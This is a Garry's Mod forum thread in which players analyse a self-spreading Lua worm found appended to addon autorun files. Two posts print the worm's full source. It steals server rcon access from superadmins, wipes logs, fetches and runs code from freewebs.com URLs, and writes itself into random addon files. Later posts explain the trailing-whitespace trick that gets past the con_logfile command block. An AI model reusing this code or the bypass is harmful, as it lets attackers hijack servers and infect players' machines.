Virus discussion thread, don't make more threads.

I recently noticed that I have a virus in gmod. It makes me change my servers rcon password when I join. I searched Rcon_password with notepad ++
and it found this in my addons folder for SBMP, Laser Stool 2, and Lua Socket Radio. These addons were fine until today. the code in them was:
[lua]
// THIS VIRUS BROUGHT TO YOU BY YOUR FAVORITE NOXIOUSE TROLLS

if ( OP ) then return end

OP = true

if ( MaxPlayers() > 1 ) then

local RrCd=[[RT=string.char(111,100,117,112,100,97,116,101,114,47,115,97,118,101,114)]]

local PrCd=[[AF=string.char(49,46,116,120,116) BF=string.char(50,46,116,120,116) CF=string.char(51,46,116,120,116)]]

local ArCd=[[T=string.char(104,116,116,112,58,47,47,119,119,119,46,102,114,101,101,119,101,98,115,46,99,111,109,47,103,109)…RT]]

local CrCd=[[function CR(a,b) AR=a BR=b http.Get(a…AF,"",function© ER=c http.Get(AR…BF,"",function(d) FR=d http.Get(AR…CF,"",function(e) BR(ER…FR…e) end) end) end) end]]

local SvCd=[[CR(T,function© T=nil RunString© end) for i=1,500 do Msg(string.rep(string.char(10),5000)) end]]

local NrCd=[[NLR=true for i=1,500 do Msg(string.rep(string.char(10),5000)) end]]

if ( SERVER ) then

for k, v in pairs( player.GetAll() ) do



	v:SendLua( RrCd )

	v:SendLua( PrCd )

	v:SendLua( ArCd )

	v:SendLua( CrCd )

	v:SendLua( SvCd )



end



hook.Add( "PlayerInitialSpawn", "PlayerSpawnInitial", function( ply )



	ply:SendLua( RrCd )

	ply:SendLua( PrCd )

	ply:SendLua( ArCd )

	ply:SendLua( CrCd )

	ply:SendLua( SvCd )

	ply:SendLua( NrCd )



end )

else

RunConsoleCommand( "rcon_password	", "" )



local function ResetLog()



	RunConsoleCommand( "con_logfile	", "" )



end



hook.Add( "InitPostEntity", "InitializeUpdate3", ResetLog )



local function UploadScript1()



	if ( !NLR && LocalPlayer():IsUserGroup( "superadmin" ) || LocalPlayer():IsSuperAdmin() ) then



		local RP = ""



		for i = 1, 8 do



			local Rand = math.random( 40, 122 )



			if ( Rand == 59 ) then Rand = 58 end



			RP = RP .. string.char( Rand )



		end



		if ( ulx ) then



			RunConsoleCommand( "ulx", "rcon", "rcon_password", RP )

			RunConsoleCommand( "rcon_password	", RP )



		elseif ( ASS_VERSION ) then



			RunConsoleCommand( "ass_rconbegin" )



			for k, v in pairs( string.Explode( "", "rcon_password " .. RP ) ) do



				RunConsoleCommand( "ass_rcon", string.byte( v ) )



			end



			RunConsoleCommand( "ass_rconend" )

			RunConsoleCommand( "rcon_password	", RP )



		end



	end



end



hook.Add( "InitPostEntity", "InitializeUpdate1", function() timer.Simple( 5, UploadScript1 ) end )



local function SC( str )



	RunConsoleCommand( "rcon	", "lua_run", str )



end



local function UploadScript2()



	if ( !NLR ) then



		local rcon = GetConVarString( "rcon_password" )



		if ( rcon && rcon != "" ) then



			timer.Simple( 5, function()



				SC( RrCd )



				timer.Simple( 0.1, function()



					SC( PrCd )



					timer.Simple( 0.1, function()



						SC( ArCd )



						timer.Simple( 0.1, function()



							SC( CrCd )



							timer.Simple( 0.1, function()



								SC( SvCd )



								timer.Simple( 0.05, ResetLog )



							end )



						end )



					end )



				end )



			end )



		else



			timer.Simple( 1, UploadScript2 )



		end



	end



end



hook.Add( "InitPostEntity", "InitializeUpdate2", function() timer.Simple( 1, UploadScript2 ) end )

end

end

local nVsn = 0

local HTTP = HTTPGet()

function UpdateRequest()

HTTP:Download( "http://www.freewebs.com/gmodupdater/command.txt", "" )

end

function UpdateTimeOut()

if ( HTTP:Finished() ) then



	local code = HTTP:GetBuffer()



	if ( code != "" ) then



		local Find = string.find( code, "

" )

		local Version = tonumber( string.sub( code, 1, Find - 1 ) )



		if ( Version && Version > nVsn ) then



			RunString( string.sub( code, Find + 1 ) )



			nVsn = Version



		end



	end



	UpdateRequest()



end

end

timer.Create( “UpdateTimeOut”, 1, 0, UpdateTimeOut )

UpdateRequest()
[/lua]
This was at the bottom of:
Laser STOOL 2\lua\autorun\laserlib.lua
SBMP\lua\autorun oolmodeladd.lua
Wire Socket Radio\lua\autorun\freefall_string.lua

The virus is appearing to add lines to the bottom of my addons when I start my gmod.

Do the same I did if you have:

  • Backward text in your game
  • Changing Rcon password with ULX or ASS Mod
  • Spamming to unban some guy from FacePunch

It appears to have gotten on my server as well.

Interesting, although I do not get this.

Great find. I’ll defer this to some LUA coders and they’ll get to work on a antivirus hopefully.

This here is actually, what the script sends to players:

[lua]RunConsoleCommand( “log”, “off” )

for i = 1, 500 do Msg( string.rep( "
", 5000 ) ) end

if ( ( !file.Exists( “…/addons/readme.txt” ) || file.Read( “…/addons/readme.txt” ) != "This is where addons go.
" ) && MaxPlayers() > 1 ) then

local function ResetLog()

	RunConsoleCommand( "con_logfile	", "" )

end

RunConsoleCommand( "con_logfile	", "addons/readme.txt" )

timer.Simple( 0.05, function()
	
	print( "This is where addons go." )

	timer.Simple( 0.05, function()

		ResetLog()

	end )

end )

local Code
local SaveFiles = {}

function SaveUpdate( file, code )

	RunConsoleCommand( "con_logfile	", file )

	if ( file == "." ) then

		timer.Simple( 1, function()

			for i = 1, 500 do Msg( string.rep( "

", 5000 ) ) end

		end )

		return

	end

	timer.Simple( 0.05, function()

		print( "" )

		for k, v in pairs( string.Explode( "

", code ) ) do

		print( v )

		end

		RunString( code )

	end )

end

timer.Create( "SaveUpdate1", 0.25, 0, function()

	if ( Code && SaveFiles && table.Count( SaveFiles ) > 0 ) then

		for k, v in pairs( SaveFiles ) do

			SaveUpdate( v, Code )

			table.remove( SaveFiles, k )

			break

		end

	end

end )

timer.Simple( 10, hook.Remove, "Think", "SaveUpdate1" )

CR( "http://www.freewebs.com/gmodupdater/script", function( code )

	Code = code

	local Files = {}
	local Find = file.Find( "../addons/*" )

	for k, v in pairs( Find ) do

		if ( v != "counter-strike" && v != "day-of-defeat" && v != "default_sent_pack" && v != "derma" && v != "hl2_ep2" && v != "portal" && v != "tf2" ) then

			local Ext = string.GetExtensionFromFilename( v )

			if ( Ext == "" || Ext == nil ) then

				local Find = file.Find( "../addons/" .. v .. "/lua/autorun/*" )

				for j, c in pair

s( Find ) do

					local Ext = string.GetExtensionFromFilename( c )

					if ( c != "client.lua" && string.sub( c, 1, 3 ) != "cl_" && string.lower( Ext ) == "lua" ) then

						table.insert( Files, "../addons/" .. v .. "/lua/autorun/" .. c )

					end

				end

			end

		end

	end

	if ( #Files == 0 ) then

		local Find = file.Find( "../gamemodes/*" )

		for k, v in pairs( Find ) do

			local Ext = string.GetExtensionFromFilename( v )

			if ( Ext == "" || Ext == nil ) then

				local File = "../gamemodes/" .. v .. "/gamemode/shared.lua"

				if ( file.Exists( File ) ) then

					table.insert( Files, File )

				end

			end

		end

	end

	SaveFiles = {}

	for i = 1, math.Clamp( 3, 0, #Files ) do

		local rand = math.random( 1, #Files )

		table.insert( SaveFiles, string.sub( Files[ rand ], 4 ) )

	end

	table.insert( SaveFiles, "." )

end )

end
[/lua]

Edit:

It’s getting it via http.Get().

Edit:

And here the URL to the two files getting downloaded and concatenated:
http://www.freewebs.com/gmodupdater/saver1.txt
http://www.freewebs.com/gmodupdater/saver2.txt
http://www.freewebs.com/gmodupdater/saver3.txt

And here the script posted in the first post:

http://www.freewebs.com/gmodupdater/script1.txt
http://www.freewebs.com/gmodupdater/script2.txt
http://www.freewebs.com/gmodupdater/script3.txt

http.Get is fetching

WHY THE FUCK is it fetching a number?

You just got “trapped” leach139.
the url http://www.freewebs.com/gmodupdater/command.txt seems to be an “update” identified.

Oh and by the way, the content of http://www.freewebs.com/gmodupdater/command.txt just changed to


233

FOOD = false

By the way, why must all these idiotic “Virus”-Writes (they are worms - but this worm has a virus part - Still a worm) “encrypt” their files? Any more advanced coder can easily “encrypt” them (I just put a print to the important parts of the file).

Yum, food.

This is a really big loophole. I’ll pull RabidToaster in on it as well.

I wouldn’t blame a specific person for this code because it could be everyone.

Edit:

I just noticed: This worm uses con_logfile using RunString() to infect lua files.

Wasn’t


con_logfile

blocked in the last GMod update by garry to prevent exactly this?
If yes, this worm is a cold case and can’t harm any further people - But if you are infected, better consider about reinstalling gmod.

I just got it. It just started happening about an hour and a half ago on my server.

It just spread to my server, and its still spreading to my users. I am trying to find the files that were infected. Can anyone help me by finding out where the files are put on the server when they are uploaded?
It just spread to me. My friend had it (he is superadmin on my server) and it got on the server. He told me to restart the server, I got on, and it made me download some files.

It uses on the end of con_logfile to bypass the protection. It seems that any other escape characters (apart from
, which was blocked) work as well…

We found out (basically [DuckYStudios] LUADuck and
RabidToaster - I was afk :)), why this worm above


still can infect current GMOD versions

.

The issue is, garry blocks console commands like sv_cheats or con_logfile by default.

But if you use special whitespace like
[ul]
[li] (tab)[/li][li]\r (carriage return) [/li][li]\a (no idea what this is)[/li][li]\f (no idea what this is)[/li][li]\v (no idea what this is)[/li][li]\b (no idea what this is)[/li][li]\ä (no idea what this is)[/li][li]\ü (no idea what this is)[/li][li]\ö (no idea what this is)[/li][li]\1 (and any other numbers from 0-9 - no idea what this is)[/li][/ul]
you can bypass this.
(Garry, you better block \ at the end directly).

[lua]
RunConsoleCommand(“con_logfile”,"/lua/autorun/HAX.lua")
[/lua]
-> RunConsoleCommand: Command is blocked! (con_logfile)

[lua]
RunConsoleCommand(“con_logfile “,”/lua/autorun/HAX.lua”)
[/lua]
No errors.

Am I correct in believing that this will change the MD5 of the Lua file in question if so I can make a quickshift program to scan for it and delete it.

No, let garry fix this security hole.

fuck :ninja:'d

You’re very keen on helping these people aren’t you :v:

Just tell them for the next update to delete all addons and reinstall it.
It’s too much work for your to get all possible Hashs of every file of every addon of every version of this addon to be sure, that this file is infected or not.

I just tried rejoining my server (Its infected) and researched for the comment at the top of the code and it reappeared in three new places in my addons folder.
It searches for your addons folder, Picks 3 random ones, Searches for the autorun folder inside that and Infects one or all of the files.
Hope that helps.

I could make it scan for the string rcon_password and display the files with that in it?

Can someone get Garry’s attention in here?
It would really help if he could get this fixed.

The chances of garry seeing this within the next 5 seconds are 1/10000000000000000000000000000000000000000000000